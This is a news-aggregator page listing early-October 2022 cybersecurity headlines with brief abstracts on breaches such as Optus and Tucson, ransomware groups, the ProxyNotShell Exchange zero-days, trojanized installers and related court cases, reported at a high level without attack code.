A new report by Linux Foundation highlighted that the average number of days to fix a vulnerability is currently 97.8 – leaving enterprises running that open-source software open to attacks for many months.Help Net Security
October 06, 2022 – General
The Ultimate SaaS Security Posture Management Checklist, 2023 Edition Full Text
Abstract
It's been a year since the release of The Ultimate SaaS Security Posture Management (SSPM) Checklist. If SSPM is on your radar, here's the 2023 checklist edition, which covers the critical features and capabilities when evaluating a solution. The ease with which SaaS apps can be deployed and adopted today is remarkable, but it has become a double-edged sword. On the one hand, apps are quickly onboarded, employees can work from anywhere, and there is little need for operational management. On the other hand, there are pain points that stem from the explosion of SaaS app usage, explained by the "3 Vs": Volume: Each app can have hundreds of global settings. Multiply this number by thousands – or tens (or even hundreds) of thousands – of employees. Security teams must first be able to discover all the users who are using each application, as well as familiarize themselves with every application's specific set of rules and configurations, and ensure they are coThe Hacker News
October 6, 2022 – Breach
City of Tucson Data Breach impacted 123,500 individuals Full Text
Abstract
The City of Tucson, Arizona disclosed a data breach; the incident was discovered in May 2022 and impacted 123,500 individuals. The security breach was discovered at the end of May 2022, and the investigation concluded in September. According to the notification...Security Affairs
October 06, 2022 – Policy and Law
Meta sues app dev for stealing over 1 million WhatsApp accounts Full Text
Abstract
Meta has sued several Chinese companies doing business as HeyMods, Highlight Mobi, and HeyWhatsApp for developing and allegedly using "unofficial" WhatsApp Android apps to steal over one million WhatsApp accounts starting May 2022.BleepingComputer
October 6, 2022 – Government
Maryland Adds Directors of State, Local Cybersecurity Full Text
Abstract
Maryland added two new high-level cyber roles to the roster, appointing a director of state cybersecurity and director of local cybersecurity, the governor’s office announced. Both positions are part of the IT department and report to the state CISO.Government Technology
October 06, 2022 – Criminals
19-Year-Old Teen Arrested for Using Leaked Optus Breach Data in SMS Scam Full Text
Abstract
The Australian Federal Police (AFP) has arrested a 19-year-old teen from Sydney for allegedly attempting to leverage the data leaked following the Optus data breach late last month to extort victims. The suspect is said to have carried out a text message blackmail scam, demanding that the recipients transfer $2,000 to a bank account or risk getting their personal information misused for fraudulent activities. The source of the data, the agency said, was a sample database of 10,200 records that was posted briefly on a cybercrime forum accessible on the clearnet by an actor named "optusdata," before taking it down. Details of the scam were previously shared by 9News Australia reporter Chris O'Keefe on September 27, 2022. The AFP further said it executed a search warrant at the home of the offender, leading to the seizure of a mobile phone used to send the text messages to about 93 Optus customers. "At this stage it appears none of the individuals who received tThe Hacker News
October 6, 2022 – Breach
19-Year-Old man arrested for misusing leaked record from Optus Breach Full Text
Abstract
The Australian Federal Police (AFP) arrested a 19-year-old teen from Sydney for attempting to use data from the Optus data breach in SMS scams. The Australian Federal Police (AFP) has arrested a 19-year-old teen from Sydney for allegedly attempting...Security Affairs
October 06, 2022 – Policy and Law
Police arrest teen for using leaked Optus data to extort victims Full Text
Abstract
The AFP (Australian Federal Police) has arrested a 19-year-old man in Sydney and charged him for allegedly using leaked Optus customer data for extortion.BleepingComputer
October 6, 2022 – Attack
Lloyd’s of London investigates possible cyber attack Full Text
Abstract
"Lloyd’s has detected unusual activity on its network and we are investigating the issue," a Lloyd's spokesperson said by email, adding that the market was resetting the network.Reuters
October 06, 2022 – Policy and Law
Former Uber Security Chief Found Guilty of Data Breach Coverup Full Text
Abstract
A U.S. federal court jury has found former Uber Chief Security Officer Joseph Sullivan guilty of not disclosing a 2016 breach of customer and driver records to regulators and attempting to cover up the incident. Sullivan has been convicted on two counts: one for obstructing justice by not reporting the incident and another for misprision. He faces a maximum of five years in prison for the obstruction charge, and a maximum of three years for the latter. "Technology companies in the Northern District of California collect and store vast amounts of data from users," U.S. Attorney Stephanie M. Hinds said in a press statement. "We expect those companies to protect that data and to alert customers and appropriate authorities when such data is stolen by hackers. Sullivan affirmatively worked to hide the data breach from the Federal Trade Commission and took steps to prevent the hackers from being caught." The 2016 hack of Uber occurred as a result of two hackers gaThe Hacker News
October 6, 2022 – Breach
“Egypt Leaks” – Hacktivists are Leaking Financial Data Full Text
Abstract
Researchers at cybersecurity firm Resecurity spotted a new group of hacktivists targeting financial institutions in Egypt. Resecurity, a California-based cybersecurity company protecting Fortune 500 corporations globally, has noticed a new group of hacktivists...Security Affairs
October 6, 2022 – Business
Kocho acquires Mobliciti to strengthen its mobile management and security capabilities Full Text
Abstract
The deal adds strategic mobile management and security capabilities to Kocho’s portfolio, allowing customers of both organizations to benefit from an end-to-end range of services that will further accelerate their digital transformation programs.Help Net Security
October 6, 2022 – Breach
Former Uber CSO Joe Sullivan found guilty in breach cover-up Full Text
Abstract
A federal jury found Sullivan guilty of obstruction of proceedings of the Federal Trade Commission (FTC) and misprision of a felony in connection with attempting to conceal the Uber breach and pay off the hackers through a bug bounty award.Tech Target
October 6, 2022 – Vulnerabilities
Dex patches authentication bug that enabled unauthorized access to client applications Full Text
Abstract
OpenID Connect (OIDC) identity service Dex has patched a critical vulnerability that would allow an attacker to fetch an ID token through an intercepted authorization code and potentially gain unauthorized access to client applications.The Daily Swig
October 05, 2022 – Ransomware
Avast releases free decryptor for MafiaWare666 ransomware variants Full Text
Abstract
Avast has released a decryptor for variants of the MafiaWare666 ransomware known as 'Jcrypt', 'RIP Lmao', and 'BrutusptCrypt', allowing victims to recover their files for free.BleepingComputer
October 05, 2022 – Government
FBI: Cyberattacks targeting election systems unlikely to affect results Full Text
Abstract
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) say in a public service announcement that cyber activity attempting to compromise election infrastructure is unlikely to cause a massive disruption or prevent voting.BleepingComputer
October 5, 2022 – Ransomware
Conti Ransomware: The History Behind One of the World’s Most Aggressive RaaS Groups Full Text
Abstract
The Conti ransomware group has become one of the most notorious cybercrime collectives in the world, known for its aggressive tactics and large-scale attacks against a wide range of public and private organizations.Flashpoint
October 05, 2022 – Privacy
Experts Warn of New RatMilad Android Spyware Targeting Enterprise Devices Full Text
Abstract
A novel Android malware called RatMilad has been observed targeting a Middle Eastern enterprise mobile device by concealing itself as a VPN and phone number spoofing app. The mobile trojan functions as advanced spyware with capabilities that receive and execute commands to collect and exfiltrate a wide variety of data from the infected mobile endpoint, Zimperium said in a report shared with The Hacker News. Evidence gathered by the mobile security company shows that the malicious app is distributed through links on social media and communication tools like Telegram, tricking unsuspecting users into sideloading the app and granting it extensive permissions. The idea behind embedding the malware within a fake VPN and phone number spoofing service is also clever in that the app claims to enable users to verify social media accounts via phone, a technique popular in countries where access is restricted. "Once installed and in control, the attackers could access the camera toThe Hacker News
October 5, 2022 – Ransomware
Avast releases a free decryptor for some Hades ransomware variants Full Text
Abstract
Avast released a free decryptor for variants of the Hades ransomware tracked as 'MafiaWare666', 'Jcrypt', 'RIP Lmao', and 'BrutusptCrypt'. Avast has released a decryptor for variants of the Hades ransomware known as 'MafiaWare666', 'Jcrypt', 'RIP...Security Affairs
October 05, 2022 – Ransomware
BlackByte ransomware abuses legit driver to disable security products Full Text
Abstract
The BlackByte ransomware gang is using a new technique that researchers are calling "Bring Your Own Driver," which enables bypassing protections by disabling more than 1,000 drivers used by various security solutions.BleepingComputer
October 5, 2022 – Insider Threat
8 strange ways employees can (accidentally) expose data Full Text
Abstract
From eyeglass reflections and new job postings to certificate transparency logs and discarded printers, employees can involuntarily and unintentionally expose confidential data in odd ways.CSO Online
October 05, 2022 – Breach
Telstra Telecom Suffers Data Breach Potentially Exposing Employee Information Full Text
Abstract
Australia's largest telecommunications company Telstra disclosed that it was the victim of a data breach through a third-party, nearly two weeks after Optus reported a breach of its own. "There has been no breach of Telstra's systems," Narelle Devine, the company's chief information security officer for the Asia Pacific region, said. "And no customer account data was involved." It said the breach targeted a third-party platform called Work Life NAB that's no longer actively used by the company, and that the leaked data posted on the internet concerned a "now-obsolete Telstra employee rewards program." Telstra also noted it became aware of the breach last week, adding the information included first and last names and the email addresses used to sign up for the program. It further clarified that the data posted was from 2017. The data was "basic in nature," Devine said. The company did not reveal how many employees werThe Hacker News
October 5, 2022 – Malware
New Maggie malware already infected over 250 Microsoft SQL servers Full Text
Abstract
Hundreds of Microsoft SQL servers all over the world have been infected with a new piece of malware tracked as Maggie. Security researchers Johann Aydinbas and Axel Wauer from the DCSO CyTec have spotted a new piece of malware, named Maggie,...Security Affairs
October 05, 2022 – Ransomware
Avast releases free decryptor for Hades ransomware variants Full Text
Abstract
Avast has released a decryptor for variants of the Hades ransomware known as 'MafiaWare666', 'Jcrypt', 'RIP Lmao', and 'BrutusptCrypt', allowing victims to recover their files for free.BleepingComputer
October 5, 2022 – Attack
New Zealand: Cyberattack on health provider Pinnacle potentially impacts thousands of patients’ data Full Text
Abstract
Health workers are scrambling to deal with a cyber attack that has compromised details kept by Waikato and Bay of Plenty health provider Pinnacle, which operates dozens of GP practices.Stuff NZ
October 05, 2022 – Government
FBI, CISA, and NSA Reveal How Hackers Targeted a Defense Industrial Base Organization Full Text
Abstract
U.S. cybersecurity and intelligence agencies on Tuesday disclosed that multiple nation-state hacking groups potentially targeted a "Defense Industrial Base (DIB) Sector organization's enterprise network" as part of a cyber espionage campaign. "[Advanced persistent threat] actors used an open-source toolkit called Impacket to gain their foothold within the environment and further compromise the network, and also used a custom data exfiltration tool, CovalentStealer, to steal the victim's sensitive data," the authorities said. The joint advisory, which was authored by the Cybersecurity and Infrastructure Security Agency (CISA), the Federal Bureau of Investigation (FBI), and the National Security Agency (NSA), said the adversaries likely had long-term access to the compromised environment. The findings are the result of CISA's incident response efforts in collaboration with a trusted third-party security firm from November 2021 through January 20The Hacker News
October 5, 2022 – Breach
Telstra Telecom discloses data breach impacting former and current employees Full Text
Abstract
Bad news for the Australian telecommunications industry: Telstra, the largest company in the country, suffered a data breach. Australia's largest telecommunications company Telstra disclosed a data breach through a third-party supplier. The company...Security Affairs
October 05, 2022 – Breach
City of Tucson discloses data breach affecting over 125,000 people Full Text
Abstract
The City of Tucson, Arizona, has disclosed a data breach affecting the personal information of more than 125,000 individuals.BleepingComputer
October 5, 2022 – Ransomware
This is how half of ransomware attacks begin, and this is how you can stop them Full Text
Abstract
Over half of ransomware attacks now begin with criminals exploiting vulnerabilities in remote and internet-facing systems as hackers look to take advantage of unpatched cybersecurity issues.ZDNet
October 05, 2022 – General
Want More Secure Software? Start Recognizing Security-Skilled Developers Full Text
Abstract
Professional developers want to do the right thing, but in terms of security, they are rarely set up for success. Organizations must support their upskilling with precision training and incentives if they want secure software from the ground up. The cyber threat landscape grows more complex by the day, with our data widely considered highly desirable "digital gold". Attackers are constantly scanning networks for vulnerable applications, programs, cloud instances, and the latest flavor of the month is APIs, with Gartner correctly predicting that they would become the most common attack vector in 2022, and that is in no small part thanks to their often lax security controls. Threat actors are so persistent that new apps can sometimes be compromised and exploited within hours of deployment. The Verizon 2022 Data Breach Investigations Report reveals that errors and misconfigurations were the cause of 13% of breaches, with the human element responsible overall for 82% of the 23,000...The Hacker News
October 5, 2022 – Malware
OnionPoison: malicious Tor Browser installer served through a popular Chinese YouTube channel Full Text
Abstract
OnionPoison: researchers reported that an infected Tor Browser installer has been distributed through a popular YouTube channel. Kaspersky researchers discovered that a trojanized version of a Windows installer for the Tor Browser has been distributed...Security Affairs
October 05, 2022 – Breach
Hundreds of Microsoft SQL servers backdoored with new malware Full Text
Abstract
Security researchers have found a new piece of malware targeting Microsoft SQL servers. Named Maggie, the backdoor has already infected hundreds of machines all over the world.BleepingComputer
October 5, 2022 – Business
RealDefense Raises $30 Million to Acquire More Privacy, Cybersecurity Firms Full Text
Abstract
The Pasadena, California-based firm this week announced that it has raised $30 million in debt financing from Sunflower Bank, which brings the total investment in the company to $50 million.Security Week
October 05, 2022 – Policy and Law
Canadian Netwalker Ransomware Affiliate Sentenced to 20 Years in U.S. Prison Full Text
Abstract
A former affiliate of the Netwalker ransomware has been sentenced to 20 years in prison in the U.S., a little over three months after the Canadian national pleaded guilty to his role in the crimes. Sebastien Vachon-Desjardins, 35, has also been ordered to forfeit $21,500,000 that was illicitly obtained from dozens of victims globally, including companies, municipalities, hospitals, law enforcement, emergency services, school districts, colleges, and universities. Launched in 2019, the Netwalker attacks particularly singled out the healthcare sector during the COVID-19 pandemic, opportunistically taking advantage of the situation to extort money from victims. "The defendant in this case used sophisticated technological means to exploit hundreds of victims in numerous countries at the height of an international health crisis," U.S. Attorney Roger B. Handberg for the Middle District of Florida said. Vachon-Desjardins, an IT engineer working for the Canadian government...The Hacker News
October 05, 2022 – Breach
CommonSpirit US nonprofit health system discloses security incident Full Text
Abstract
CommonSpirit Health, one of the largest nonprofit health systems in the United States, says it took down some of its IT systems because of a security incident that has impacted multiple facilities.BleepingComputer
October 5, 2022 – Breach
CommonSpirit Health Suffers ‘IT Security Incident’ Impacting Facilities in Multiple Regions Full Text
Abstract
CommonSpirit Health, one of the nation’s largest health systems, said it experienced an “IT security incident” on Monday at an undisclosed number of facilities in multiple regions.Cybersecurity Dive
October 05, 2022 – Vulnerabilities
Mitigation for Exchange Zero-Days Bypassed! Microsoft Issues New Workarounds Full Text
Abstract
Microsoft has revised its mitigation measures for the newly disclosed and actively exploited zero-day flaws in Exchange Server after it was found that they could be trivially bypassed. The two vulnerabilities, tracked as CVE-2022-41040 and CVE-2022-41082, have been codenamed ProxyNotShell due to similarities to another set of flaws called ProxyShell, which the tech giant resolved last year. In-the-wild attacks abusing the shortcomings have chained the two flaws to gain remote code execution on compromised servers with elevated privileges, leading to the deployment of web shells. The Windows maker, which is yet to release a fix for the bugs, has acknowledged that a single state-sponsored threat actor may have been weaponizing the flaws since August 2022 in limited targeted attacks. In the meantime, the company has made available temporary workarounds to reduce the risk of exploitation by restricting known attack patterns through a rule in the IIS Manager. However, according...The Hacker News
October 05, 2022 – Vulnerabilities
Microsoft updates mitigation for ProxyNotShell Exchange zero days Full Text
Abstract
Microsoft has updated the mitigation for the latest Exchange zero-day vulnerabilities tracked as CVE-2022-41040 and CVE-2022-41082, also referred to as ProxyNotShell.BleepingComputer
October 5, 2022 – Breach
Australian Staff at Security Firm G4S on Alert After Tax Numbers and Bank Details Posted Online Full Text
Abstract
Current and former Australian employees of security firm G4S have been told to be on alert after personal information – including tax file numbers, bank account information, and medical checks – was stolen and posted online in a ransomware attack.The Guardian
October 05, 2022 – Malware
New Android malware ‘RatMilad’ can steal your data, record audio Full Text
Abstract
A new Android spyware named 'RatMilad' was discovered targeting mobile devices in the Middle East, used to spy on victims and steal data.BleepingComputer
October 04, 2022 – Hacker
Hackers stole data from US defense org using Impacket, CovalentStealer Full Text
Abstract
The U.S. Government today released an alert about state-backed hackers using a custom CovalentStealer malware and the Impacket framework to steal sensitive data from a U.S. organization in the Defense Industrial Base (DIB) sector.BleepingComputer
October 04, 2022 – Government
US Govt: Hackers stole data from US defense org using new malware Full Text
Abstract
The U.S. Government today released an alert about state-backed hackers using a custom CovalentStealer malware and the Impacket framework to steal sensitive data from a U.S. organization in the Defense Industrial Base (DIB) sector.BleepingComputer
October 4, 2022 – Hacker
Witchetty Group Uses Steganography To Target Middle East Entities Full Text
Abstract
In an ongoing cyberespionage campaign, hacking group Witchetty has been found targeting two governments in the Middle East and a stock exchange in Africa. Among the new tools used by the group is a backdoor named Stegmap. The malware is distributed via the rarely used steganography technique.Cyware Alerts - Hacker News
October 04, 2022 – Criminals
Russian Hacker Arrested in India for Reportedly Helping Students Cheat in JEE-Main Exam Full Text
Abstract
India's Central Bureau of Investigation (CBI) on Monday disclosed that it has detained a Russian national for allegedly hacking into a software platform used to conduct engineering entrance assessments in the country in 2021. "The said accused was detained by the Bureau of Immigration at Indira Gandhi International Airport, Delhi while arriving in India from Almaty, Kazakhstan," the primary investigating agency said in a press release. The name of the individual was not disclosed by the agency, but Indian news reports identified the person as Mikhail Shargin. The CBI further said that Shargin's role was uncovered as part of its investigation into alleged irregularities committed in the Joint Entrance Examination (JEE-Main) conducted last year. JEE is a standardized test used for admissions to engineering colleges in India. The September 2021 incident, per the agency, involved breaking into iLeon software, the platform on which the exam was held, with the g...The Hacker News
October 4, 2022 – Vulnerabilities
A flaw in the Packagist PHP repository could have allowed supply chain attacks Full Text
Abstract
Experts disclosed a flaw in the PHP software package repository Packagist that could have been exploited to carry out supply chain attacks. SonarSource Researchers disclosed details about a now-fixed vulnerability (CVE-2022-24828) in PHP software...Security Affairs
October 04, 2022 – Policy and Law
Netwalker ransomware affiliate sentenced to 20 years in prison Full Text
Abstract
Former Netwalker ransomware affiliate Sebastien Vachon-Desjardins has been sentenced to 20 years in prison and demanded to forfeit $21.5 million for his attacks on a Tampa company and other entities.BleepingComputer
October 4, 2022 – Vulnerabilities
Hackers Target Zero-Days in Microsoft Exchange Full Text
Abstract
Vietnamese cybersecurity company GTSC uncovered a zero-day in fully patched Microsoft Exchange servers. The flaws are being tracked (by Zero Day Initiative) as ZDI-CAN-18333 with a CVSS score of 8.8 and ZDI-CAN-18802 with a CVSS score of 6.3. The bug could be abused by attackers to achieve remote a ... Read MoreCyware Alerts - Hacker News
October 04, 2022 – Phishing
Popular YouTube Channel Caught Distributing Malicious Tor Browser Installer Full Text
Abstract
A popular Chinese-language YouTube channel has emerged as a means to distribute a trojanized version of a Windows installer for the Tor Browser. Kaspersky dubbed the campaign OnionPoison, with all of the victims located in China. The scale of the attack remains unclear, but the Russian cybersecurity company said it detected victims appearing in its telemetry in March 2022. The malicious version of the Tor Browser installer is being distributed via a link present in the description of a video that was uploaded to YouTube on January 9, 2022. It has been viewed over 64,500 times to date. The channel hosting the video has 181,000 subscribers and claims to be based in Hong Kong. The video is still available to watch on the social media platform as of writing. The attack banks on the fact that the actual Tor Browser website is blocked in China, thus tricking unsuspecting users searching for "Tor浏览器" (i.e., Tor Browser in Chinese) on YouTube into potentially downloading th...The Hacker News
October 4, 2022 – APT
Lazarus APT employed an exploit in a Dell firmware driver in recent attacks Full Text
Abstract
North Korea-linked Lazarus APT has been spotted deploying a Windows rootkit by taking advantage of an exploit in a Dell firmware driver. The North Korea-backed Lazarus Group has been observed deploying a Windows rootkit by relying on an exploit in a Dell...Security Affairs
October 04, 2022 – Cryptocurrency
Hackers are breaching scam sites to hijack crypto transactions Full Text
Abstract
In a perfect example of there being no honor among thieves, a threat actor named 'Water Labbu' is hacking into cryptocurrency scam sites to inject malicious JavaScript that steals funds from the scammer's victims.BleepingComputer
October 4, 2022 – Malware
Malicious Tor Browser spreads through YouTube Full Text
Abstract
One of the libraries bundled with the malicious Tor Browser is infected with spyware that collects various personal data and sends it to a command and control server. It also gives attackers the ability to execute shell commands.Securelist
October 04, 2022 – Vulnerabilities
Researchers Report Supply Chain Vulnerability in Packagist PHP Repository Full Text
Abstract
Researchers have disclosed details about a now-patched high-severity security flaw in Packagist, a PHP software package repository, that could have been exploited to mount software supply chain attacks. "This vulnerability allows gaining control of Packagist," SonarSource researcher Thomas Chauchefoin said in a report shared with The Hacker News. Packagist is used by the PHP package manager Composer to determine and download software dependencies that are included by developers in their projects. The disclosure comes as planting malware in open source repositories is turning into an attractive conduit for mounting software supply chain attacks. Tracked as CVE-2022-24828 (CVSS score: 8.8), the issue has been described as a case of command injection and is linked to another similar Composer bug (CVE-2021-29472) that came to light in April 2021, suggesting an inadequate patch. "An attacker controlling a Git or Mercurial repository explicitly listed by URL...The Hacker News
October 4, 2022 – APT
Linux Cheerscrypt ransomware is linked to Chinese DEV-0401 APT group Full Text
Abstract
Researchers link recently discovered Linux ransomware Cheerscrypt to the China-linked cyberespionage group DEV-0401. Researchers at cybersecurity firm Sygnia attributed the recently discovered Linux ransomware Cheerscrypt to the China-linked cyber...Security Affairs
October 04, 2022 – Breach
Optus confirms 2.1 million ID numbers exposed in data breach Full Text
Abstract
Optus confirmed yesterday that 2.1 million customers had government identification numbers compromised during a cyberattack last month.BleepingComputer
October 4, 2022 – APT
SolarMarker APT Returns in a New Watering Hole Attack Full Text
Abstract
Digital adversaries behind the SolarMarker malware crippled a global tax consulting firm by camouflaging fake Chrome browser updates as part of watering hole attacks. Threat actors use the Google Dorking technique and conduct source code searches to identify such vulnerable websites before injectin ... Read MoreCyware Alerts - Hacker News
October 04, 2022 – General
Back to Basics: Cybersecurity’s Weakest Link Full Text
Abstract
A big promise with a big appeal. You hear that a lot in the world of cybersecurity, where you're often promised a fast, simple fix that will take care of all your cybersecurity needs, solving your security challenges in one go. It could be an AI-based tool, a new superior management tool, or something else – and it would probably be quite effective at what it promises to do. But is it a silver bullet for all your cybersecurity problems? No. There's no easy, technology-driven fix for what is really cybersecurity's biggest challenge: the actions of human beings. It doesn't matter how state-of-the-art your best defenses are. Perimeter firewalls, multi-tiered logins, multi-factor authentication, AI tools – all of these are easily rendered ineffective when Bob from a nondescript department clicks on a phishing link in an email. This isn't news to anyone. We've all heard this before. The fact that humans are a key flaw in cybersecurity strategy is hardly news –...The Hacker News
October 4, 2022 – Vulnerabilities
Microsoft mitigations for recently disclosed Exchange zero-days can be easily bypassed Full Text
Abstract
The mitigation shared by Microsoft for the two recently disclosed Exchange zero-day vulnerabilities can be bypassed, an expert warns. Last week, Microsoft confirmed that two zero-day vulnerabilities in Microsoft Exchange recently disclosed by researchers...Security Affairs
October 04, 2022 – Ransomware
Cheerscrypt ransomware linked to a Chinese hacking group Full Text
Abstract
The Cheerscrypt ransomware has been linked to a Chinese hacking group named 'Emperor Dragonfly,' known to frequently switch between ransomware families to evade attribution.BleepingComputer
October 4, 2022 – Vulnerabilities
JavaScript sandbox vm2 remediates remote code execution risk Full Text
Abstract
A bug in vm2, a popular JavaScript sandbox environment, could allow malicious actors to bypass sandbox protections and stage remote code execution (RCE) on the host device.The Daily Swig
October 04, 2022 – Policy and Law
BEC Scammer Gets 25-Year Jail Sentence for Stealing Over $9.5 Million Full Text
Abstract
A 46-year-old man in the U.S. has been sentenced to 25 years in prison after being found guilty of laundering over $9.5 million accrued by carrying out cyber-enabled financial fraud. Elvis Eghosa Ogiekpolor of Norcross, Georgia, operated a money laundering network that opened at least 50 business bank accounts for illicitly receiving funds from unsuspecting individuals and businesses after falling victim to romance frauds and business email compromise (BEC) scams. Ogiekpolor was charged by a federal grand jury in February 2022 with one count of conspiracy to commit money laundering and 15 counts of substantive money laundering. The scheme was operational from October 2018 to August 2020. According to the U.S. Justice Department (DoJ), Ogiekpolor enlisted the help of eight "money mules" to open the phony bank accounts under the names of non-existent companies, which were subsequently used to stash the proceeds from their criminal activities. These included creating fic...The Hacker News
October 04, 2022 – Government
FBI warns of “Pig Butchering” cryptocurrency investment schemes Full Text
Abstract
The Federal Bureau of Investigation (FBI) warns of a rise in 'Pig Butchering' cryptocurrency scams used to steal ever-increasing amounts of crypto from unsuspecting investors.BleepingComputer
October 4, 2022 – Vulnerabilities
Critical Vulnerabilities Expose Parking Management System to Hacker Attacks Full Text
Abstract
Nearly a dozen vulnerabilities have been found in a car parking management system made by Italian company Carlo Gavazzi, which makes electronic control components for building and industrial automation.Security Week
October 04, 2022 – Government
CISA Orders Federal Agencies to Regularly Track Network Assets and Vulnerabilities Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued a new Binding Operational Directive (BOD) that directs federal agencies in the country to keep track of assets and vulnerabilities on their networks six months from now. To that end, Federal Civilian Executive Branch (FCEB) enterprises have been tasked with two sets of activities: Asset discovery and vulnerability enumeration, which are seen as essential steps to gain "greater visibility into risks facing federal civilian networks." This involves carrying out automated asset discovery every seven days and initiating vulnerability enumeration across those discovered assets every 14 days by April 3, 2023, in addition to having the capabilities to do so on an on-demand basis within 72 hours of receiving a request from CISA. Similar baseline vulnerability enumeration obligations have also been put in place for Android and iOS devices as well as other devices that reside outside of agency on-premise...The Hacker News
October 04, 2022 – Malware
ProxyNotShell – the New Proxy Hell? Full Text
Abstract
Nicknamed ProxyNotShell, a new exploit used in the wild takes advantage of the recently published Microsoft Server-Side Request Forgery (SSRF) vulnerability CVE-2022-41040 and a second vulnerability, CVE-2022-41082, that allows Remote Code Execution (RCE) when PowerShell is available to unidentified attackers. Based on ProxyShell, this new zero-day abuse risk leverages a chained attack similar to the one used in the 2021 ProxyShell attack that exploited the combination of multiple vulnerabilities - CVE-2021-34523, CVE-2021-34473, and CVE-2021-31207 – to permit a remote actor to execute arbitrary code. Despite the potential severity of attacks using them, ProxyShell vulnerabilities are still on CISA's list of top 2021 routinely exploited vulnerabilities. Meet ProxyNotShell. Recorded on September 19, 2022, CVE-2022-41082 is an attack vector targeting Microsoft's Exchange Servers, enabling attacks of low complexity with low privileges required. Impacted services, if vulnerable, enable...The Hacker News
October 03, 2022 – Breach
TD Bank discloses data breach after employee leaks customer info Full Text
Abstract
TD Bank has disclosed a data breach affecting an undisclosed number of customers whose personal information was stolen by a former employee and used to conduct financial fraud.BleepingComputer
October 3, 2022 – Government
Finnish intelligence warns of Russia’s cyberespionage activities Full Text
Abstract
The Finnish Security Intelligence Service (Suojelupoliisi or SUPO) warns of a highly likely intensification of cyberespionage activities conducted by Russia-linked threat actors over the winter.Security Affairs
October 03, 2022 – Attack
Comm100 Chat Provider Hijacked to Spread Malware in Supply Chain Attack Full Text
Abstract
A threat actor likely with associations to China has been attributed to a new supply chain attack that involves the use of a trojanized installer for the Comm100 Live Chat application to distribute a JavaScript backdoor. Cybersecurity firm CrowdStrike said the attack made use of a signed Comm100 desktop agent app for Windows that was downloadable from the company's website. The scale of the attack is currently unknown, but the trojanized file is said to have been identified at organizations in the industrial, healthcare, technology, manufacturing, insurance, and telecom sectors in North America and Europe. Comm100 is a Canadian provider of live audio/video chat and customer engagement software for enterprises. It claims to have more than 15,000 customers across 51 countries. "The installer was signed on September 26, 2022 at 14:54:00 UTC using a valid Comm100 Network Corporation certificate," the company noted, adding it remained available until September 29. E...The Hacker News
October 3, 2022 – General
Don’t Assume China’s AI Regulations Are Just a Power Play Full Text
Abstract
Commentators have framed new regulations on AI systems in China as part of an effort to micromanage algorithms. But this fails to address other possible rationales—and glosses over constraints inherent in regulating emerging technologies.Lawfare
October 3, 2022 – Malware
Trojanized Comm100 Live Chat app installer distributed a JavaScript backdoor Full Text
Abstract
A threat actor used a trojanized installer for the Comm100 Live Chat application to distribute a JavaScript backdoor. Cybersecurity firm CrowdStrike disclosed details of a supply chain attack that involved the use of a trojanized installer for the Comm100...Security Affairs
October 03, 2022 – Malware
Fake Microsoft Exchange ProxyNotShell exploits for sale on GitHub Full Text
Abstract
Scammers are impersonating security researchers to sell fake proof-of-concept ProxyNotShell exploits for newly discovered Microsoft Exchange zero-day vulnerabilities.BleepingComputer
October 3, 2022 – Breach
Update: Optus reveals extent of data breach, but stays mum on how it happened Full Text
Abstract
Of the 9.8 million customers impacted by the data breach, 1.2 million have at least one form of identification number that is valid, says the Singtel-owned Australian operator, adding that it has brought in Deloitte to investigate the breach.ZDNet
October 03, 2022 – Ransomware
Researchers Link Cheerscrypt Linux-Based Ransomware to Chinese Hackers Full Text
Abstract
The recently discovered Linux-based ransomware strain known as Cheerscrypt has been attributed to a Chinese cyber espionage group known for operating short-lived ransomware schemes. Cybersecurity firm Sygnia attributed the attacks to a threat actor it tracks under the name Emperor Dragonfly, which is also known as Bronze Starlight (Secureworks) and DEV-0401 (Microsoft). "Emperor Dragonfly deployed open source tools that were written by Chinese developers for Chinese users," the company said in a report shared with The Hacker News. "This reinforces claims that the 'Emperor Dragonfly' ransomware operators are based in China." The use of Cheerscrypt is the latest addition to a long list of ransomware families previously deployed by the group in little over a year, including LockFile, Atom Silo, Rook, Night Sky, Pandora, and LockBit 2.0. Secureworks, in its profile of the group, noted "it is plausible that Bronze Starlight deploys ransomware as a s...The Hacker News
October 3, 2022 – Criminals
RansomEXX gang claims to have hacked Ferrari and leaked online internal documents Full Text
Abstract
The Italian luxury sports car manufacturer Ferrari confirmed the availability of internal documents online, but said it has no evidence of cyber attack. Documents belonging to the Italian luxury sports car manufacturer Ferrari are circulating online,...Security Affairs
October 03, 2022 – Breach
Russian retail chain ‘DNS’ confirms hack after data leaked online Full Text
Abstract
Russian retail chain 'DNS' (Digital Network System) disclosed yesterday that they suffered a data breach that allegedly exposed the personal information of 16 million customers and employees.BleepingComputer
October 3, 2022 – General
Many IT pros don’t think a ransomware attack can impact Microsoft 365 data Full Text
Abstract
The 2022 Ransomware Report by Hornetsecurity, which surveyed over 2,000 IT leaders, revealed that 24% have been victims of a ransomware attack, with 20% of attacks happening in the last year.Help Net Security
October 03, 2022 – Vulnerabilities
Hackers Exploiting Dell Driver Vulnerability to Deploy Rootkit on Targeted Computers Full Text
Abstract
The North Korea-backed Lazarus Group has been observed deploying a Windows rootkit by taking advantage of an exploit in a Dell firmware driver, highlighting new tactics adopted by the state-sponsored adversary. The Bring Your Own Vulnerable Driver (BYOVD) attack, which took place in the autumn of 2021, is another variant of the threat actor's espionage-oriented activity called Operation In(ter)ception that's directed against aerospace and defense industries. "The campaign started with spear-phishing emails containing malicious Amazon-themed documents and targeted an employee of an aerospace company in the Netherlands, and a political journalist in Belgium," ESET researcher Peter Kálnai said. Attack chains unfolded upon the opening of the lure documents, leading to the distribution of malicious droppers that were trojanized versions of open source projects, corroborating recent reports from Google's Mandiant and Microsoft. ESET said it uncovered evid...The Hacker News
October 3, 2022 – Government
Finnish intelligence warns of Russia’s cyberespionage activities Full Text
Abstract
The Finnish Security Intelligence Service (SUPO) warns Russia will highly likely intensify its cyber activity over the winter. The Finnish Security Intelligence Service (Suojelupoliisi or SUPO) warns of a highly likely intensification of cyberespionage...Security Affairs
October 03, 2022 – Breach
Live support service hacked to spread malware in supply chain attack Full Text
Abstract
The official installer for the Comm100 Live Chat application, a widely deployed SaaS (software-as-a-service) that businesses use for customer communication and website visitors, was trojanized as part of a new supply-chain attack.BleepingComputer
October 3, 2022 – Hacker
Analysis of DeftTorero TTPs in 2019–2021 Full Text
Abstract
